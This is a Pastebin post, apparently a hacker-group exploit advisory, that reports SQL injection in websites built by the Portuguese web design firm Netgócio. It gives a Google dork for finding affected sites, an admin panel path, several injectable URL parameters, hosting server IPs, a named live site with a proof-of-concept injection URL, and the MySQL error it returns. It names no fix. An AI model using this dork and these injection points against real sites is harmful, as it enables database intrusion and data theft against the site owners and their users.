Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ############################################################
- # Exploit Title : Development Netgócio.pt ® Portugal Web Design SQL Injection
- # Author [ Discovered By ] : KingSkrupellos
- # Team : Cyberizm Digital Security Army
- # Date : 11/01/2019
- # Vendor Homepage : netgocio.pt
- # Tested On : Windows and Linux
- # Category : WebApps
- # Exploit Risk : Medium
- # Google Dorks : inurl:''Development Netgócio ®'' site:pt
- # Vulnerability Type : CWE-89 [ Improper Neutralization of
- Special Elements used in an SQL Command ('SQL Injection') ]
- ############################################################
- # Admin Panel Login Path :
- *************************
- /area-reservada.php
- # SQL Injection Exploit :
- ***********************
- /comentarios.php?id=[SQL Injection]
- /pedir_avaliacao.php?id=
- /biblioteca-popup.php?id=[ID-NUMBER]&cat=
- [ID-NUMBER]&prod=[ID-NUMBER]&bib=[SQL Injection]
- /biblioteca-popup.php?id=[ID-NUMBER]&cat=
- [ID-NUMBER]&prod=[SQL Injection]
- /loja-online-retomas.php?id=[SQL Injection]
- ############################################################
- # Example Vulnerable Site :
- *************************
- Note : (185.2.4.101) => There are 691 domains hosted on this server.
- Note : (94.126.168.68) => There are 245 domains hosted on this server.
- [+] mobilitec.pt/comentarios.php?id=424%27 =>
- [ Proof of Concept ] => archive.fo/UCtWZ
- ############################################################
- # SQL Database Error :
- **********************
- You have an error in your SQL syntax; check the manual
- that corresponds to your MySQL server version for the
- right syntax to use near '1' ORDER BY id DESC' at line 1
- ############################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- ############################################################
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement